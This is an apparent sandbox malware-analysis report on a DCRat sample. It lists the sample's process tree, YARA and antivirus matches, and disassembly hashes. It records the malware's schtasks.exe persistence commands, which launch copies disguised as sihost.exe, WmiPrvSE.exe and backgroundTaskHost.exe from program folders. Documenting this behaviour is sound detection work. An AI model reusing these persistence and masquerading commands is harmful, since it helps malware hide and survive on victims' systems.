            Path:C:\Users\user\Desktop\w9d568i4Ia.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\w9d568i4Ia.exe"
            Imagebase:0x750000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low

            General

            Target ID:1
            Start time:14:17:31
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 5 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:2
            Start time:14:17:32
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtn" /sc ONLOGON /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:3
            Start time:14:17:32
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 11 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:6
            Start time:14:17:34
            Start date:20/09/2022
            Path:C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            Imagebase:0x6d0000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000006.00000002.545115901.00000000129B7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000006.00000002.545094899.0000000012995000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:low

            General

            Target ID:8
            Start time:14:17:34
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:9
            Start time:14:17:34
            Start date:20/09/2022
            Path:C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe
            Imagebase:0xbe0000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:low

            General

            Target ID:10
            Start time:14:17:35
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:12
            Start time:14:17:35
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:14
            Start time:14:17:37
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:15
            Start time:14:17:38
            Start date:20/09/2022
            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe
            Wow64 process (32bit):false
            Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe
            Imagebase:0x230000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML

            General

            Target ID:17
            Start time:14:17:39
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:18
            Start time:14:17:42
            Start date:20/09/2022
            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe
            Wow64 process (32bit):false
            Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe
            Imagebase:0xd0000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET

            General

            Target ID:19
            Start time:14:17:42
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:20
            Start time:14:17:44
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:22
            Start time:14:17:45
            Start date:20/09/2022
            Path:C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe
            Wow64 process (32bit):false
            Commandline:C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe
            Imagebase:0x5e0000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML

            General

            Target ID:23
            Start time:14:17:45
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:24
            Start time:14:17:45
            Start date:20/09/2022
            Path:C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe
            Wow64 process (32bit):false
            Commandline:C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe
            Imagebase:0x900000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET

            General

            Target ID:25
            Start time:14:17:45
            Start date:20/09/2022
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /rl HIGHEST /f
            Imagebase:0x7ff690a80000
            File size:226816 bytes
            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:29
            Start time:14:17:48
            Start date:20/09/2022
            Path:C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
            Wow64 process (32bit):false
            Commandline:C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
            Imagebase:0x150000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML

            General

            Target ID:30
            Start time:14:17:48
            Start date:20/09/2022
            Path:C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
            Wow64 process (32bit):false
            Commandline:C:\Program Files (x86)\windows nt\backgroundTaskHost.exe
            Imagebase:0x100000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET

            General

            Target ID:31
            Start time:14:18:04
            Start date:20/09/2022
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat"
            Imagebase:0x7ff707bb0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:32
            Start time:14:18:04
            Start date:20/09/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff745070000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:33
            Start time:14:18:05
            Start date:20/09/2022
            Path:C:\Windows\System32\w32tm.exe
            Wow64 process (32bit):false
            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Imagebase:0x7ff68c370000
            File size:88576 bytes
            MD5 hash:71540E4248A944A8A60E80063D423608
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:35
            Start time:14:18:12
            Start date:20/09/2022
            Path:C:\Users\user\Desktop\w9d568i4Ia.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\w9d568i4Ia.exe"
            Imagebase:0x500000
            File size:937472 bytes
            MD5 hash:2405CB014678984F0655CF9603C04ABD
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FFBACF6EE6E Relevance: 5.1, Strings: 4, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: !$3$A$]
              • API String ID: 0-874543953
              • Opcode ID: 50ef51b61c2c715f6e1406e38957809c525c76a32166cb61c2554a8571c27419
              • Instruction ID: 550ed561614cab80685be96b33a2423eba19915301eebca66165bdfe63fac4bc
              • Opcode Fuzzy Hash: 50ef51b61c2c715f6e1406e38957809c525c76a32166cb61c2554a8571c27419
              • Instruction Fuzzy Hash: FB314AB1D0966A8FDBA9DF24C8997E9B7B1EF15310F0041E9D54DA7281CB34AE88CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6EC8D Relevance: 5.1, Strings: 4, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[
              • API String ID: 0-1255984973
              • Opcode ID: a37206e20d52f971ac97dd02c63f82fb893cd65e170a8574971376d14ecc365b
              • Instruction ID: 02c072726181ef32dc6e577aee5263457ee28d90b52b56be39ce2be7275c8127
              • Opcode Fuzzy Hash: a37206e20d52f971ac97dd02c63f82fb893cd65e170a8574971376d14ecc365b
              • Instruction Fuzzy Hash: 5A210CB1D096698BEB6DDF20C8557E977B5BF55300F0041ADD40EA6281CB79AA84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6F4DA Relevance: 2.7, Strings: 2, Instructions: 156COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: H$M
              • API String ID: 0-2018367969
              • Opcode ID: 56ba33dc26485bffdf854672de51fcc34230b097aabbffd15567346d988fb15e
              • Instruction ID: 3872e6d9b52077d24de8d9d33c9959ec806338fe3fba0ed904780452bdc7e867
              • Opcode Fuzzy Hash: 56ba33dc26485bffdf854672de51fcc34230b097aabbffd15567346d988fb15e
              • Instruction Fuzzy Hash: B75129B0D08A698FDBA4DB28C8957A9B7F1FB58301F4001EAD50DE3281DF35AE858F05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C33D Relevance: 1.4, Strings: 1, Instructions: 153COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: /m_H
              • API String ID: 0-3695095870
              • Opcode ID: 1170e3134d11ac5570c544ec120553ac20c61bfae55e16fdf036c786f41138a1
              • Instruction ID: c4bf21cf1a634b00a590d6cb5da57b018514ba777463a42e1c8fce3a6d3ff3cf
              • Opcode Fuzzy Hash: 1170e3134d11ac5570c544ec120553ac20c61bfae55e16fdf036c786f41138a1
              • Instruction Fuzzy Hash: 4E514CB0D0951D8FDB95EB78C4596EDBBB1EF58300F10417AD40EE7291CE39A8898B54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6F384 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: H
              • API String ID: 0-2852464175
              • Opcode ID: 4e317b083fcf9edcab2c363588775a30f1d02bbbf1d1c30c81f0109df5bd8e14
              • Instruction ID: 3cf0475252fc3e7af78fae7682c84a33c9e12621093110c0849f8ceab8f1da9f
              • Opcode Fuzzy Hash: 4e317b083fcf9edcab2c363588775a30f1d02bbbf1d1c30c81f0109df5bd8e14
              • Instruction Fuzzy Hash: BF412EF1D1895D8FDBA8DB28C8957A8B7B1EF58300F4041EAD60DE3242CE356E868F05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF622C7 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: ;!
              • API String ID: 0-2498391034
              • Opcode ID: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction ID: b50338e68b5454ef81880c1a099e2f6b28721baafd08385ba856a10a4aab1c4f
              • Opcode Fuzzy Hash: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction Fuzzy Hash: 09313EF1D0A56A8BEB66DB30C8497FCB3B1BF05300F5041B9C84E93291DF7AA9489B00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C4BD Relevance: 1.3, Strings: 1, Instructions: 45COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID: _
              • API String ID: 0-701932520
              • Opcode ID: 97017d8ab73f90f68c318444ea7dfd7ac202c6d6895ccaf6755ef56e2f625ab8
              • Instruction ID: 81c3291dbebfbe5f591fb685862543d742a102239715bd09379f3d2140fc7510
              • Opcode Fuzzy Hash: 97017d8ab73f90f68c318444ea7dfd7ac202c6d6895ccaf6755ef56e2f625ab8
              • Instruction Fuzzy Hash: C901D6B170485A4BDB49FB3CE8A80F977A0FF9C360B00057BD54ACB091CE32A4868650
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF62B88 Relevance: .4, Instructions: 386COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 108de092e6791f6fe1b0e08e7260b82b42f89b3f5ed726796fd94cc8394281ff
              • Instruction ID: 8626a929bb49fb1e5408dc97db537eda239c77e11b990346bb86fe02b1b1032a
              • Opcode Fuzzy Hash: 108de092e6791f6fe1b0e08e7260b82b42f89b3f5ed726796fd94cc8394281ff
              • Instruction Fuzzy Hash: 44E179B1D1965D8FEB99DB68C4997BCB7B1FF58300F1001BAD00ED7292CA35A886DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF61AF5 Relevance: .4, Instructions: 370COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67a0666c7bce0265b67ed270bdfe74631206d1b20ae63691f16b00c1bb300ab2
              • Instruction ID: d02d2bea88e8b3d9a46ecb7df211055c94706d7f0f07966801497eb1abc10aa5
              • Opcode Fuzzy Hash: 67a0666c7bce0265b67ed270bdfe74631206d1b20ae63691f16b00c1bb300ab2
              • Instruction Fuzzy Hash: 89B108A2A0D7964FEB17973CE46A1F97BD0DF43235B1801BBD4C9CA0A3DD19984A8391
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6D159 Relevance: .3, Instructions: 311COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a17c2e6330b7a4cd01ae3ccea9198159f5565d47e968f3edd0b33e42defefbc
              • Instruction ID: c0ef27db660aab19ed28f60d6d5a4dccceecc4f8e9f5722f31d58b97ab4f847c
              • Opcode Fuzzy Hash: 3a17c2e6330b7a4cd01ae3ccea9198159f5565d47e968f3edd0b33e42defefbc
              • Instruction Fuzzy Hash: 7FB1ADB1D1969D8FEB99DB68C8697B8B7F1FF54300F0401BAD00DD7292CA38A985DB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99107895a00b22d1df315650b3e5325c393e3cfa63efeb0ff8702ba9f486a2c6
              • Instruction ID: fee8be1fe16d44ff8070ea1211903c92c3e6e7ef371db1bf44e632e2540e133f
              • Opcode Fuzzy Hash: 99107895a00b22d1df315650b3e5325c393e3cfa63efeb0ff8702ba9f486a2c6
              • Instruction Fuzzy Hash: 1471AFB2D1898D8FEB84DB6CE8557ADBBE1FF4A310F50027AC00DD3696DA752806CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6086E Relevance: .2, Instructions: 209COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bc6eb78f18d131e90232b05ffbf065ec15cad9764ff0250ba442c919498c57b5
              • Instruction ID: 9164244720a0f0b6dbc6c06c192c962ab5923be7a25199ed4b8fbe2ffc991ac9
              • Opcode Fuzzy Hash: bc6eb78f18d131e90232b05ffbf065ec15cad9764ff0250ba442c919498c57b5
              • Instruction Fuzzy Hash: 0171D7B1D09A4E4FEB55EB74C8597EDB7A1EF54310F1042B9C40ED71A2DE35A889CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6A938 Relevance: .2, Instructions: 207COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a543d3046327005bfaa7d596923907cbea5a77566c6c06dd3bd24db5d3bbc73
              • Instruction ID: 4e54605cf4f819ecc044e8e9349a624e8d123ff096ac800af95a8db6b328197c
              • Opcode Fuzzy Hash: 3a543d3046327005bfaa7d596923907cbea5a77566c6c06dd3bd24db5d3bbc73
              • Instruction Fuzzy Hash: 136105B0D0995D8EEB95EB78C8987EDB7F1EF59300F50017AD40DE7292DE35A8849B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF746A0 Relevance: .2, Instructions: 197COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 08451663ff4a5c38e571eaedca3c12d195b0f6e6b2719d04270208b5e68a10b4
              • Instruction ID: 5b7a488d52772b14a38554a7c431f66a16061cc8a952e99feb8fb97f2fb7433d
              • Opcode Fuzzy Hash: 08451663ff4a5c38e571eaedca3c12d195b0f6e6b2719d04270208b5e68a10b4
              • Instruction Fuzzy Hash: B5515FB0909A5D8FDB95EB78D8596ADBBF0FF59310F10016AD40DD7292CE35A885CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6BCE9 Relevance: .2, Instructions: 175COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8def968860884493ec6baef9edac8bc661ba63ff069fca6b5f40729dc91e59a
              • Instruction ID: 5eaa3a57bd7a07ccb6c200b7084556537a19d62448f15507d74e091136ae4ed5
              • Opcode Fuzzy Hash: e8def968860884493ec6baef9edac8bc661ba63ff069fca6b5f40729dc91e59a
              • Instruction Fuzzy Hash: 065115B0D0999D8EEB95EB78C8597ECB7B1FF59300F5001BAC40DE3292DE39A9459B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF62035 Relevance: .2, Instructions: 156COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8981bab7d0fd60bf027d6f0af6c5cec517e2d104f6f907f481c0cbf27a1cede1
              • Instruction ID: b16ccc794102ce3556cf8050814c3c42080f9414852d56522c8ded254791d7b8
              • Opcode Fuzzy Hash: 8981bab7d0fd60bf027d6f0af6c5cec517e2d104f6f907f481c0cbf27a1cede1
              • Instruction Fuzzy Hash: 1B4123B1A0D68A4FE796DB38D4591B8BBD1EF45310F0545BAE84DC31A3DE3AE84AC341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF82C00 Relevance: .1, Instructions: 148COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.376214099.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffbacf60000_w9d568i4Ia.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b450973de280beb6105e42ca4665ca5b53e0068a3c88a7e77e992fbae7a2620e
              • Instruction ID: 6c2bd395584145a7c976c628ba75f81822125661da7425ff7b8eb09fef198326
              • Opcode Fuzzy Hash: b450973de280beb6105e42ca4665ca5b53e0068a3c88a7e77e992fbae7a2620e
              • Instruction Fuzzy Hash: 4951F8B0D096198AEB55DFB4C8986FDBAB1FF59310F10017AD80AE7291CB39A949CB14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF618F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
